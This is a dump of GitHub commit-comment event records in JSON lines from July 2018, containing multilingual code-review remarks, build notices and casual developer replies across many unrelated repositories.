{"id":"7918854403","type":"CommitCommentEvent","actor":{"login":"zalyotov"},"repo":{"name":"dGazizullin/News-Cataloge"},"payload":{"comment":{"id":29596418,"position":20,"line":20,"path":"index.php","commit_id":"fd173135d6c75ec75fd90e17e76ba10e2276c73c","created_at":"2018-07-04T14:37:36Z","updated_at":"2018-07-04T14:37:36Z","author_association":"NONE","body":"Здесь надо использовать сеттеры"}},"created_at":"2018-07-04T14:37:36Z"}
{"id":"7918856639","type":"CommitCommentEvent","actor":{"login":"zalyotov"},"repo":{"name":"dGazizullin/News-Cataloge"},"payload":{"comment":{"id":29596422,"position":28,"line":28,"path":"index.php","commit_id":"fd173135d6c75ec75fd90e17e76ba10e2276c73c","created_at":"2018-07-04T14:38:02Z","updated_at":"2018-07-04T14:38:02Z","author_association":"NONE","body":"Для чего здесь статическая функция?"}},"created_at":"2018-07-04T14:38:02Z"}
{"id":"7918857325","type":"CommitCommentEvent","actor":{"login":"Hirbod"},"repo":{"name":"FriendsOfREDAXO/undo"},"payload":{"comment":{"id":29596424,"position":28,"line":28,"path":"lib/undo.php","commit_id":"31db007f6a502a66c222ab70c997398071d2fd66","created_at":"2018-07-04T14:38:10Z","updated_at":"2018-07-04T14:38:10Z","author_association":"MEMBER","body":"Theoretisch ja, an diesen Zustand habe ich bei der Entwicklung auch gedacht."}},"created_at":"2018-07-04T14:38:10Z"}
{"id":"7918872524","type":"CommitCommentEvent","actor":{"login":"NateWickstrom"},"repo":{"name":"NateWickstrom/splitter-solidity"},"payload":{"comment":{"id":29596455,"position":5,"line":45,"path":"contracts/Splitter.sol","commit_id":"18138fd8da61fe6e4d651bc78337df5feedca2e7","created_at":"2018-07-04T14:40:56Z","updated_at":"2018-07-04T14:40:56Z","author_association":"OWNER","body":"got it"}},"created_at":"2018-07-04T14:40:56Z"}
{"id":"7918877743","type":"CommitCommentEvent","actor":{"login":"NateWickstrom"},"repo":{"name":"NateWickstrom/splitter-solidity"},"payload":{"comment":{"id":29596462,"position":11,"line":51,"path":"contracts/Splitter.sol","commit_id":"18138fd8da61fe6e4d651bc78337df5feedca2e7","created_at":"2018-07-04T14:41:56Z","updated_at":"2018-07-04T14:41:56Z","author_association":"OWNER","body":"yep, that more readable"}},"created_at":"2018-07-04T14:41:56Z"}
{"id":"7918878196","type":"CommitCommentEvent","actor":{"login":"mvl22"},"repo":{"name":"DoccyB/cycledata"},"payload":{"comment":{"id":29596463,"position":null,"line":null,"path":null,"commit_id":"4e99bd87357e4248af996bd7441413be041c8413","created_at":"2018-07-04T14:42:01Z","updated_at":"2018-07-04T14:42:01Z","author_association":"COLLABORATOR","body":"Good work.\r\n\r\nYou might want to add `*.swp` to the `.gitignore` file to avoid those temp files being committed."}},"created_at":"2018-07-04T14:42:01Z"}
{"id":"7918879836","type":"CommitCommentEvent","actor":{"login":"hathach"},"repo":{"name":"adafruit/circuitpython"},"payload":{"comment":{"id":29596464,"position":null,"line":null,"path":null,"commit_id":"7fff7f5e70c652ccffce2a598a4e3b7df92ad67b","created_at":"2018-07-04T14:42:20Z","updated_at":"2018-07-04T14:42:20Z","author_association":"MEMBER","body":"Ah yeah, it is nice indeed. msc with internal flash is mostly done as well, just a bit more work for to switch between internal flash and qspi. "}},"created_at":"2018-07-04T14:42:20Z"}
{"id":"7918884336","type":"CommitCommentEvent","actor":{"login":"NateWickstrom"},"repo":{"name":"NateWickstrom/remittance-spolidity"},"payload":{"comment":{"id":29596475,"position":47,"line":33,"path":"Remittance.sol","commit_id":"1990d8801aee67ed5d68d6bd11d9e5b5da0e0152","created_at":"2018-07-04T14:43:13Z","updated_at":"2018-07-04T14:43:13Z","author_association":"OWNER","body":"haha - yeah, sure."}},"created_at":"2018-07-04T14:43:13Z"}
{"id":"7918885489","type":"CommitCommentEvent","actor":{"login":"traneTheCoder"},"repo":{"name":"traneTheCoder/first-repo"},"payload":{"comment":{"id":29596476,"position":null,"line":null,"path":null,"commit_id":"3786d76cca0c7986acdc689c67aaecaa9e900d19","created_at":"2018-07-04T14:43:27Z","updated_at":"2018-07-04T14:43:27Z","author_association":"OWNER","body":"\r\n[test.txt](https://github.com/traneTheCoder/first-repo/files/2163601/test.txt)\r\n"}},"created_at":"2018-07-04T14:43:27Z"}
{"id":"7918886307","type":"CommitCommentEvent","actor":{"login":"traneTheCoder"},"repo":{"name":"traneTheCoder/first-repo"},"payload":{"comment":{"id":29596478,"position":null,"line":null,"path":null,"commit_id":"3786d76cca0c7986acdc689c67aaecaa9e900d19","created_at":"2018-07-04T14:43:37Z","updated_at":"2018-07-04T14:43:37Z","author_association":"OWNER","body":"just testing"}},"created_at":"2018-07-04T14:43:37Z"}
{"id":"7918887873","type":"CommitCommentEvent","actor":{"login":"narcolepticinsomniac"},"repo":{"name":"openstyles/stylus"},"payload":{"comment":{"id":29596485,"position":null,"line":null,"path":null,"commit_id":"7a90f68d19a258d31dc578a1671a528ef981b8e2","created_at":"2018-07-04T14:43:55Z","updated_at":"2018-07-04T14:43:55Z","author_association":"MEMBER","body":"OK, there was a typo, but I had already fixed it in the correct tab. Time for a break."}},"created_at":"2018-07-04T14:43:55Z"}
{"id":"7918889328","type":"CommitCommentEvent","actor":{"login":"macro0000"},"repo":{"name":"macro0000/vue-blog"},"payload":{"comment":{"id":29596490,"position":null,"line":null,"path":null,"commit_id":"9af5cf2f154621931b0c97fbb3d881c12a0321fe","created_at":"2018-07-04T14:44:12Z","updated_at":"2018-07-04T14:44:12Z","author_association":"OWNER","body":"a"}},"created_at":"2018-07-04T14:44:12Z"}
{"id":"7918897525","type":"CommitCommentEvent","actor":{"login":"pachinix"},"repo":{"name":"pachinix/pachinix.github.io"},"payload":{"comment":{"id":29596511,"position":8,"line":11,"path":"job.html","commit_id":"d8825c31b518d13533130a4389a9bfd50ad7ee2c","created_at":"2018-07-04T14:45:46Z","updated_at":"2018-07-04T14:45:46Z","author_association":"OWNER","body":"a href=\"index.html\" target=\"_blank\"><h1>Городчанин <span>Олег Олегович</span></h1></a>"}},"created_at":"2018-07-04T14:45:46Z"}
{"id":"7918897763","type":"CommitCommentEvent","actor":{"login":"zalyotov"},"repo":{"name":"dGazizullin/News-Cataloge"},"payload":{"comment":{"id":29596512,"position":33,"line":33,"path":"index.php","commit_id":"fd173135d6c75ec75fd90e17e76ba10e2276c73c","created_at":"2018-07-04T14:45:48Z","updated_at":"2018-07-04T14:45:48Z","author_association":"NONE","body":"Используй в методах объявление типов http://php.net/manual/ru/functions.arguments.php#functions.arguments.type-declaration\r\n"}},"created_at":"2018-07-04T14:45:48Z"}
{"id":"7918899871","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29596515,"position":null,"line":null,"path":null,"commit_id":"400ce6949aa1b77acaf1f52d75f9b41a4ba3e53f","created_at":"2018-07-04T14:46:14Z","updated_at":"2018-07-04T14:46:14Z","author_association":"OWNER","body":"Build version: __`0.10.0-master.203`__ :crossed_fingers: [`master`](https://github.com/streamich/ci-scripts/tree/master) on [*CircleCI*](https://circleci.com/gh/streamich/ci-scripts/203) :tada:"}},"created_at":"2018-07-04T14:46:14Z"}
{"id":"7918903623","type":"CommitCommentEvent","actor":{"login":"hanzala-sohrab"},"repo":{"name":"hanzala-sohrab/Java-programs"},"payload":{"comment":{"id":29596527,"position":null,"line":null,"path":null,"commit_id":"82729f94cf14d9116676f0d4f7c4d52d853ba821","created_at":"2018-07-04T14:46:57Z","updated_at":"2018-07-04T14:46:57Z","author_association":"OWNER","body":"Works for numbers upto 1000\r\nTODO : make it work for all numbers"}},"created_at":"2018-07-04T14:46:57Z"}
{"id":"7918904368","type":"CommitCommentEvent","actor":{"login":"Berkmann18"},"repo":{"name":"Berkmann18/SaCoin"},"payload":{"comment":{"id":29596529,"position":null,"line":null,"path":null,"commit_id":"b9d407205b0e746d168742e2f4e4c6e152be6822","created_at":"2018-07-04T14:47:07Z","updated_at":"2018-07-04T14:47:07Z","author_association":"OWNER","body":"It seems that I get 11 ESLint security warnings which don't seem to be a problem or with an obvious solution.\r\nI'll raise that in #1."}},"created_at":"2018-07-04T14:47:07Z"}
{"id":"7918904811","type":"CommitCommentEvent","actor":{"login":"berryzplus"},"repo":{"name":"sakura-editor/sakura"},"payload":{"comment":{"id":29596531,"position":76,"line":76,"path":"sakura_core/_os/ProcessPriority.h","commit_id":"9515cb9c4218a33ada395b2517e5c737d033ccd6","created_at":"2018-07-04T14:47:12Z","updated_at":"2018-07-04T14:47:12Z","author_association":"CONTRIBUTOR","body":"絶対にfalseにならない想定の条件式をデバッグコードに埋め込むことはよくやります。\r\nサクラエディタはassertを独自定義していますが、基本的な使い方は普通のcassertと同じです。\r\n\r\n書いている条件式は論理的に常に成立するはずの式です。\r\nSetPriorityClassが失敗する条件は、\r\n_hProcessが無効（値が無効or既に終了している)な場合と\r\n_dwDefaultPriorityで指定した優先度が不正（無効な値or現在と同じ)な場合です。\r\n\r\nここの処理に関しては少し書き換えました。\r\nassertする意味もないように考え直したのでassertは削除しました。"}},"created_at":"2018-07-04T14:47:12Z"}
{"id":"7918904853","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29596532,"position":null,"line":null,"path":null,"commit_id":"400ce6949aa1b77acaf1f52d75f9b41a4ba3e53f","created_at":"2018-07-04T14:47:12Z","updated_at":"2018-07-04T14:47:12Z","author_association":"OWNER","body":"Build version: __`0.10.0-master.307`__ :crossed_fingers: [`master`](https://github.com/streamich/ci-scripts/tree/master) on [*Travis*](https://travis-ci.org/streamich/ci-scripts/builds/400044732) :tada:"}},"created_at":"2018-07-04T14:47:12Z"}
{"id":"7918910610","type":"CommitCommentEvent","actor":{"login":"japer21"},"repo":{"name":"Jwata/SushiDetectoriOS"},"payload":{"comment":{"id":29596545,"position":null,"line":null,"path":null,"commit_id":"23cac79041168012b84f2ae015134158854a3cf4","created_at":"2018-07-04T14:48:19Z","updated_at":"2018-07-04T14:48:19Z","author_association":"NONE","body":"Thank you for providing your modifications. In my case I have checked out the 1.8.0 from tensorflow and the model is trained using ssd_lite and inception_v2. Do you think it should work? Thanks in advance"}},"created_at":"2018-07-04T14:48:19Z"}
{"id":"7918913599","type":"CommitCommentEvent","actor":{"login":"killerwife"},"repo":{"name":"cmangos/mangos-classic"},"payload":{"comment":{"id":29596554,"position":null,"line":null,"path":null,"commit_id":"ac29bd0c72b292c10e988a026df3ba2d3aaeda33","created_at":"2018-07-04T14:48:52Z","updated_at":"2018-07-04T14:48:52Z","author_association":"CONTRIBUTOR","body":"@dagochen     SPELL_AURA_MOD_CASTING_SPEED_NOT_STACK = 65, and \r\nAura Id 65 (SPELL_AURA_MOD_CASTING_SPEED), value = -50, misc = 0 (0), periodic = 0\r\n\r\n@cala (i have no clue why i can never link you by autofill) the spell applies because it has a different effect, only the cast speed aura immunes out, hence cast time is not slowed, at least to my knowledge."}},"created_at":"2018-07-04T14:48:52Z"}
{"id":"7918916815","type":"CommitCommentEvent","actor":{"login":"dideex"},"repo":{"name":"dideex/guns-broker"},"payload":{"comment":{"id":29596564,"position":19,"line":174,"path":"product.html","commit_id":"aa87f699281e3289b1d9c4a44c42897c524319fc","created_at":"2018-07-04T14:49:28Z","updated_at":"2018-07-04T14:49:28Z","author_association":"OWNER","body":"Fix correct current slider id"}},"created_at":"2018-07-04T14:49:28Z"}
{"id":"7918917832","type":"CommitCommentEvent","actor":{"login":"ystarlongzi"},"repo":{"name":"Tencent/wepy"},"payload":{"comment":{"id":29596566,"position":45,"line":242,"path":"packages/wepy/src/component.js","commit_id":"b5b7f7fa66f5d195d7422ae902e0bd2bd817e47c","created_at":"2018-07-04T14:49:40Z","updated_at":"2018-07-04T14:49:40Z","author_association":"CONTRIBUTOR","body":"@cuijiemmx @Gcaufy 对 `com.$mixins` 的遍历是不是也不应该移除？"}},"created_at":"2018-07-04T14:49:40Z"}
{"id":"7918919180","type":"CommitCommentEvent","actor":{"login":"Marco-MC"},"repo":{"name":"CCBlueX/FileCloud"},"payload":{"comment":{"id":29596567,"position":null,"line":null,"path":null,"commit_id":"86559659ff16fdebe65c446bca289c449a6b9299","created_at":"2018-07-04T14:49:56Z","updated_at":"2018-07-04T14:49:56Z","author_association":"MEMBER","body":"\"https\" funktioniert bei den Capes glaube nicht."}},"created_at":"2018-07-04T14:49:56Z"}
{"id":"7918920605","type":"CommitCommentEvent","actor":{"login":"DoccyB"},"repo":{"name":"DoccyB/cycledata"},"payload":{"comment":{"id":29596569,"position":null,"line":null,"path":null,"commit_id":"4e99bd87357e4248af996bd7441413be041c8413","created_at":"2018-07-04T14:50:13Z","updated_at":"2018-07-04T14:50:13Z","author_association":"OWNER","body":"Good point, I was going to ask about those.\n\nJust got the page queries working nicely too! :D\n\nOn 4 July 2018 at 15:42, Martin <notifications@github.com> wrote:\n\n> Good work.\n>\n> You might want to add *.swp to the .gitignore file to avoid those temp\n> files being committed.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/DoccyB/cycledata/commit/4e99bd87357e4248af996bd7441413be041c8413#commitcomment-29596463>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AXIQ3FygYI0EU7ooyciT746pKN56RLwfks5uDNQ5gaJpZM4VCspp>\n> .\n>\n"}},"created_at":"2018-07-04T14:50:13Z"}
{"id":"7918922900","type":"CommitCommentEvent","actor":{"login":"dideex"},"repo":{"name":"dideex/guns-broker"},"payload":{"comment":{"id":29596577,"position":8,"line":2891,"path":"css/main.css","commit_id":"aa87f699281e3289b1d9c4a44c42897c524319fc","created_at":"2018-07-04T14:50:39Z","updated_at":"2018-07-04T14:50:39Z","author_association":"OWNER","body":"fix nav items align"}},"created_at":"2018-07-04T14:50:39Z"}
{"id":"7918927333","type":"CommitCommentEvent","actor":{"login":"neithender"},"repo":{"name":"Dwigt007/VerticalMasternodeSetup"},"payload":{"comment":{"id":29596584,"position":null,"line":null,"path":null,"commit_id":"b6cde6082d2a576edfee95e664d6920b5f6500ab","created_at":"2018-07-04T14:51:29Z","updated_at":"2018-07-04T14:51:29Z","author_association":"NONE","body":"Great :)"}},"created_at":"2018-07-04T14:51:29Z"}
{"id":"7918929300","type":"CommitCommentEvent","actor":{"login":"zalyotov"},"repo":{"name":"dGazizullin/News-Cataloge"},"payload":{"comment":{"id":29596588,"position":215,"line":215,"path":"index.php","commit_id":"fd173135d6c75ec75fd90e17e76ba10e2276c73c","created_at":"2018-07-04T14:51:53Z","updated_at":"2018-07-04T14:51:53Z","author_association":"NONE","body":"array_push($this->catIdArr, $catId);\r\nЯ бы использовал $this->catIdAddr[] = $catId;\r\nБолее простая и понятная запись"}},"created_at":"2018-07-04T14:51:53Z"}
{"id":"7918930086","type":"CommitCommentEvent","actor":{"login":"dideex"},"repo":{"name":"dideex/guns-broker"},"payload":{"comment":{"id":29596589,"position":14,"line":2896,"path":"css/main.css","commit_id":"aa87f699281e3289b1d9c4a44c42897c524319fc","created_at":"2018-07-04T14:52:02Z","updated_at":"2018-07-04T14:52:02Z","author_association":"OWNER","body":"negative margins for nav items container"}},"created_at":"2018-07-04T14:52:02Z"}
{"id":"7918930459","type":"CommitCommentEvent","actor":{"login":"schmel"},"repo":{"name":"muggot/openmcu"},"payload":{"comment":{"id":29596591,"position":null,"line":null,"path":null,"commit_id":"1a1e76472eac78041fea554943d15ebf954033f4","created_at":"2018-07-04T14:52:07Z","updated_at":"2018-07-04T14:52:07Z","author_association":"COLLABORATOR","body":"Ремонт в здании, где был сервер. 5.07 поеду включать оборудование, человек который этим занимался - в отпуске. Сайт хостится в дружественной организации. На хостинг, пока нет средств. Может в ближайшем времени что-то придумаю с балансировкой."}},"created_at":"2018-07-04T14:52:07Z"}
{"id":"7918931613","type":"CommitCommentEvent","actor":{"login":"dideex"},"repo":{"name":"dideex/guns-broker"},"payload":{"comment":{"id":29596598,"position":19,"line":2901,"path":"css/main.css","commit_id":"aa87f699281e3289b1d9c4a44c42897c524319fc","created_at":"2018-07-04T14:52:20Z","updated_at":"2018-07-04T14:52:20Z","author_association":"OWNER","body":"margins for nav items"}},"created_at":"2018-07-04T14:52:20Z"}
{"id":"7918941871","type":"CommitCommentEvent","actor":{"login":"Dimensional"},"repo":{"name":"ShumnoT/VitaCheatDatabase"},"payload":{"comment":{"id":29596615,"position":null,"line":null,"path":null,"commit_id":"fd964f3239ccf1b772e5d8543b30101565f6aa26","created_at":"2018-07-04T14:54:13Z","updated_at":"2018-07-04T14:54:13Z","author_association":"NONE","body":"Try making the codes inside VitaCheat. I've had the same issue before,\nbut never looked into the exact cause. Either the file was encoded in\nsome format the program couldn't read, it couldn't read line endings\nthat the PC defaults to, or the file was just badly copied to the Vita.\nRegardless, typing it in manually seems to work.\n\n\nOn 7/3/2018 11:40 PM, kirasento wrote:\n>\n> Hi Demensional\n> i have install FFX mai dump....the Game ID PCSE00293....like your\n> instrustion above...i make random code and export it and i already\n> copy the code above except the game id....when i transfer the file\n> back it doesnt show any cheats...can you make and PCSE00293 file? also\n> i hack my vita using h-encore and install enso 3.65\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/ShumnoT/VitaCheatDatabase/commit/fd964f3239ccf1b772e5d8543b30101565f6aa26#commitcomment-29589815>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AEy14YQdNmxvZGk6P5fcoVEGFYF2hb_Dks5uDEc5gaJpZM4Qf89s>.\n>\n\n\n\n---\nThis email has been checked for viruses by Avast antivirus software.\nhttps://www.avast.com/antivirus\n"}},"created_at":"2018-07-04T14:54:13Z"}
{"id":"7918944657","type":"CommitCommentEvent","actor":{"login":"ihiruma"},"repo":{"name":"progedu/pull-request-study"},"payload":{"comment":{"id":29596621,"position":null,"line":null,"path":null,"commit_id":"c048b6b825ede6a301556f66576ce578a30223e4","created_at":"2018-07-04T14:54:41Z","updated_at":"2018-07-04T14:54:41Z","author_association":"NONE","body":"プルリクのテストなのでマージ不要です"}},"created_at":"2018-07-04T14:54:41Z"}
{"id":"7918944687","type":"CommitCommentEvent","actor":{"login":"bouncyball-git"},"repo":{"name":"ilia3101/MLV-App"},"payload":{"comment":{"id":29596622,"position":null,"line":null,"path":null,"commit_id":"a2625c36a08f15cb7ca82d53ece7401b6ff70eb1","created_at":"2018-07-04T14:54:41Z","updated_at":"2018-07-04T14:54:41Z","author_association":"COLLABORATOR","body":"Second is a good solution."}},"created_at":"2018-07-04T14:54:41Z"}
{"id":"7918946053","type":"CommitCommentEvent","actor":{"login":"zalyotov"},"repo":{"name":"dGazizullin/News-Cataloge"},"payload":{"comment":{"id":29596623,"position":224,"line":224,"path":"index.php","commit_id":"fd173135d6c75ec75fd90e17e76ba10e2276c73c","created_at":"2018-07-04T14:54:55Z","updated_at":"2018-07-04T14:54:55Z","author_association":"NONE","body":"Еще должна быть родительская категория.\r\n0 или пусто - если категория верхнего уровня, в противном случае id родительской категории"}},"created_at":"2018-07-04T14:54:55Z"}
{"id":"7918947892","type":"CommitCommentEvent","actor":{"login":"natecrow"},"repo":{"name":"natecrow/my-destinations"},"payload":{"comment":{"id":29596628,"position":null,"line":null,"path":null,"commit_id":"a8886ac0f3d55c057a02049db5c0f23e90ad6299","created_at":"2018-07-04T14:55:16Z","updated_at":"2018-07-04T14:55:16Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Not showing destinations in list](https://trello.com/c/JBTKfhgn/25-not-showing-destinations-in-list)"}},"created_at":"2018-07-04T14:55:16Z"}
{"id":"7918948837","type":"CommitCommentEvent","actor":{"login":"cookiecavekeeper"},"repo":{"name":"stiftungswo/Dime"},"payload":{"comment":{"id":29596632,"position":5,"line":10,"path":"env/run_coverage.sh","commit_id":"938a64e5113e0c6ed9d4e5a1a609c35e25b41e6f","created_at":"2018-07-04T14:55:26Z","updated_at":"2018-07-04T14:55:26Z","author_association":"CONTRIBUTOR","body":"fehlt hier nicht ein `$` vor `ROOT_DIR `?"}},"created_at":"2018-07-04T14:55:26Z"}
{"id":"7918949325","type":"CommitCommentEvent","actor":{"login":"sidey79"},"repo":{"name":"RFD-FHEM/RFFHEM"},"payload":{"comment":{"id":29596633,"position":null,"line":null,"path":null,"commit_id":"5b24ee8334d09ec08594b2a238b6138a005e2086","created_at":"2018-07-04T14:55:32Z","updated_at":"2018-07-04T14:55:32Z","author_association":"CONTRIBUTOR","body":"In der aktuellen Implementierung bin ich mir recht sicher, dass es zu keiner Endlosschleife kommt. 100% würde ich da jetzt nicht drauf setzten, aber 99,999% schon.\r\nIch hatte mich mit dem Fall der Endlosschleife beschäftigt. Das war in der Tat etwas tricky. Da ich seither nie selbst ein Problem hatte oder von einem gehört habe bin ich der Meinung dass der code aktuell alles anfängt.\r\n\r\nWenn Du Bedenken hinsichtlich der korrekten Funktion deines Codes hast, sollte das erst mal ausgeräumt werden.\r\n\r\nDu könntest mithilfe deines Zählers alle relevanten Parameter ausgeben lassen.\r\n"}},"created_at":"2018-07-04T14:55:32Z"}
{"id":"7918950785","type":"CommitCommentEvent","actor":{"login":"SylvainDevidal"},"repo":{"name":"Hopman/OpenTTD"},"payload":{"comment":{"id":29596662,"position":null,"line":null,"path":null,"commit_id":"f27991964c79af3a4a6ccd30629ae5d1f381bbd8","created_at":"2018-07-04T14:55:47Z","updated_at":"2018-07-04T14:55:47Z","author_association":"NONE","body":"Tell me if I'm wrong, but I think the error message \"STR_ERROR_TOO_CLOSE_TO_ANOTHER_STATION\" is now useless.\r\nOr may be there are some other places where the bug perists."}},"created_at":"2018-07-04T14:55:47Z"}
{"id":"7918955095","type":"CommitCommentEvent","actor":{"login":"joaobarcia"},"repo":{"name":"joaobarcia/Pointsquare"},"payload":{"comment":{"id":29596689,"position":null,"line":null,"path":null,"commit_id":"5a031facca439e6f4e16e4bc8e9f3d3c43b25276","created_at":"2018-07-04T14:56:36Z","updated_at":"2018-07-04T14:56:36Z","author_association":"OWNER","body":"This commit fixes #25 and not the issue previously mentioned"}},"created_at":"2018-07-04T14:56:36Z"}
{"id":"7918956078","type":"CommitCommentEvent","actor":{"login":"Drakensin"},"repo":{"name":"tiffit/TaleCraft"},"payload":{"comment":{"id":29596690,"position":null,"line":null,"path":null,"commit_id":"e2d33fe9035ba4b2bc182920213912b8c9a8ffa4","created_at":"2018-07-04T14:56:46Z","updated_at":"2018-07-04T14:56:46Z","author_association":"NONE","body":"I am glad you are working on this to get to 1.12. Cant wait to see it ready"}},"created_at":"2018-07-04T14:56:46Z"}
{"id":"7918963465","type":"CommitCommentEvent","actor":{"login":"mbollemeijer"},"repo":{"name":"luizdepra/hugo-coder"},"payload":{"comment":{"id":29596711,"position":null,"line":null,"path":null,"commit_id":"c9d4c83fafc46d9ae9ad1edbc6a29c0df358659e","created_at":"2018-07-04T14:58:12Z","updated_at":"2018-07-04T14:58:12Z","author_association":"CONTRIBUTOR","body":"@luizdepra \r\nis there any specific reason to why you create a new directory ?\r\nwith rsync command (never used it before tho, until now) you can do the following.\r\n`\trsync -av --exclude='exampleSite' --exclude='.git' . exampleSite/themes/coder\r\n\tcd exampleSite && hugo serve -D`\r\n\r\nUnless you have specific reason :-) "}},"created_at":"2018-07-04T14:58:12Z"}
{"id":"7918963884","type":"CommitCommentEvent","actor":{"login":"maxnet"},"repo":{"name":"raspberrypi-ui/piwiz"},"payload":{"comment":{"id":29596712,"position":null,"line":null,"path":null,"commit_id":"7063e8eac1ab5060d7f402d94494f4121e040a34","created_at":"2018-07-04T14:58:17Z","updated_at":"2018-07-04T14:58:17Z","author_association":"NONE","body":"And to make things more complicated. :-)\r\nPlease ignore the comment in the file saying that the Dutch prefer \"US international\" variant, but map NL to normal US instead.\r\n\r\n\"US international\" is only preferred by people using their computer only for word processing.\r\nWith this variant variant one can press on the keyboard <'> <e> to get an accented é character.\r\nIt has the consequence one needs to enter <'> <space> to get a normal ' though.\r\nAnd <\"> <space> to get a normal \"\r\n\r\nIf you are a programmer you typically need to write a lot more quotes in your code, than you need to write accented characters.\r\nSo if you consider the Pi to be a development platform, plain US layout would be a more sensible default, instead of the US international variant.\r\n\r\n(Other OSes like Windows typically offer a systray applet to switch between the two variants)\r\n"}},"created_at":"2018-07-04T14:58:17Z"}
{"id":"7918969025","type":"CommitCommentEvent","actor":{"login":"seyednaser"},"repo":{"name":"seyednaser/InternaStorageApplication"},"payload":{"comment":{"id":29596722,"position":13,"line":18,"path":"app/src/main/res/layout/activity_main.xml","commit_id":"c892aee177a32c8ceb129a47913c0dac2f1e9cc5","created_at":"2018-07-04T14:59:18Z","updated_at":"2018-07-04T14:59:18Z","author_association":"OWNER","body":"Please take text from string resources"}},"created_at":"2018-07-04T14:59:18Z"}
{"id":"7918970311","type":"CommitCommentEvent","actor":{"login":"rjimenezda"},"repo":{"name":"CartoDB/carto.js"},"payload":{"comment":{"id":29596727,"position":null,"line":null,"path":null,"commit_id":"5e97249e9b7944ac5a8b8ea7046f04c6c914cd58","created_at":"2018-07-04T14:59:33Z","updated_at":"2018-07-04T14:59:33Z","author_association":"CONTRIBUTOR","body":"redeploying 😂 "}},"created_at":"2018-07-04T14:59:33Z"}
{"id":"7918978793","type":"CommitCommentEvent","actor":{"login":"srfrnk"},"repo":{"name":"DAVFoundation/missions"},"payload":{"comment":{"id":29596747,"position":2,"line":1,"path":"src/lib/api.js","commit_id":"eecadc0921f4ccd950a71f20da12b0a36c3558e2","created_at":"2018-07-04T15:01:06Z","updated_at":"2018-07-04T15:01:06Z","author_association":"MEMBER","body":"This file should be removed. The functionality should be put to where it is used."}},"created_at":"2018-07-04T15:01:06Z"}
{"id":"7918979139","type":"CommitCommentEvent","actor":{"login":"rjimenezda"},"repo":{"name":"CartoDB/carto.js"},"payload":{"comment":{"id":29596749,"position":null,"line":null,"path":null,"commit_id":"5e97249e9b7944ac5a8b8ea7046f04c6c914cd58","created_at":"2018-07-04T15:01:10Z","updated_at":"2018-07-04T15:01:10Z","author_association":"CONTRIBUTOR","body":"Oh it's an example, never mind"}},"created_at":"2018-07-04T15:01:10Z"}
{"id":"7918982456","type":"CommitCommentEvent","actor":{"login":"kirasento"},"repo":{"name":"ShumnoT/VitaCheatDatabase"},"payload":{"comment":{"id":29596771,"position":null,"line":null,"path":null,"commit_id":"fd964f3239ccf1b772e5d8543b30101565f6aa26","created_at":"2018-07-04T15:01:47Z","updated_at":"2018-07-04T15:01:47Z","author_association":"NONE","body":"Yes just got it working....after left besaid the game freezes rip FFX 😭"}},"created_at":"2018-07-04T15:01:47Z"}
{"id":"7918985946","type":"CommitCommentEvent","actor":{"login":"Yuhaijun1106"},"repo":{"name":"Yuhaijun1106/springboot-mongo"},"payload":{"comment":{"id":29596780,"position":4,"line":8,"path":"src/main/java/com/bdqn/sbm/SbmApplication.java","commit_id":"d5d73ae444957437d60bd3074cdb4ded263666c4","created_at":"2018-07-04T15:02:29Z","updated_at":"2018-07-04T15:02:29Z","author_association":"OWNER","body":"yu"}},"created_at":"2018-07-04T15:02:29Z"}
{"id":"7918986974","type":"CommitCommentEvent","actor":{"login":"Yuhaijun1106"},"repo":{"name":"Yuhaijun1106/springboot-mongo"},"payload":{"comment":{"id":29596782,"position":null,"line":null,"path":null,"commit_id":"d5d73ae444957437d60bd3074cdb4ded263666c4","created_at":"2018-07-04T15:02:41Z","updated_at":"2018-07-04T15:02:41Z","author_association":"OWNER","body":"asd"}},"created_at":"2018-07-04T15:02:41Z"}
{"id":"7918990066","type":"CommitCommentEvent","actor":{"login":"srfrnk"},"repo":{"name":"DAVFoundation/missions"},"payload":{"comment":{"id":29596787,"position":1,"line":8,"path":"src/lib/dav.js","commit_id":"eecadc0921f4ccd950a71f20da12b0a36c3558e2","created_at":"2018-07-04T15:03:18Z","updated_at":"2018-07-04T15:03:18Z","author_association":"MEMBER","body":"This file should be removed. The functionality should come from DAV.JS package."}},"created_at":"2018-07-04T15:03:18Z"}
{"id":"7918991752","type":"CommitCommentEvent","actor":{"login":"bugan"},"repo":{"name":"bugan/FugaEspacial_UnityMobile"},"payload":{"comment":{"id":29596793,"position":85,"line":85,"path":"Assets/Scritpt/Gameplay/ControlePause.cs","commit_id":"a96069b98bddf1a1c4fe6dace3a01559530575d4","created_at":"2018-07-04T15:03:38Z","updated_at":"2018-07-04T15:03:38Z","author_association":"OWNER","body":"O FixedUpdate é um evento da própria Unity aqui eu mantive em inglês pra ter essa referencia direta ao evento. Acha necessário mudar mesmo?"}},"created_at":"2018-07-04T15:03:38Z"}
{"id":"7918993892","type":"CommitCommentEvent","actor":{"login":"zalyotov"},"repo":{"name":"dGazizullin/News-Cataloge"},"payload":{"comment":{"id":29596797,"position":20,"line":20,"path":"index.php","commit_id":"fd173135d6c75ec75fd90e17e76ba10e2276c73c","created_at":"2018-07-04T15:04:03Z","updated_at":"2018-07-04T15:04:03Z","author_association":"NONE","body":"$authId отсутствует"}},"created_at":"2018-07-04T15:04:03Z"}
{"id":"7918995935","type":"CommitCommentEvent","actor":{"login":"ErmolaevAM"},"repo":{"name":"AgurovaL/JavaSummerPractice2018"},"payload":{"comment":{"id":29596798,"position":4,"line":47,"path":"pom.xml","commit_id":"7b82a74db0f0dcd52be0379487e9d9e0f8363b5e","created_at":"2018-07-04T15:04:26Z","updated_at":"2018-07-04T15:04:26Z","author_association":"COLLABORATOR","body":"Вынести все версии зависимостей в блок properties."}},"created_at":"2018-07-04T15:04:26Z"}
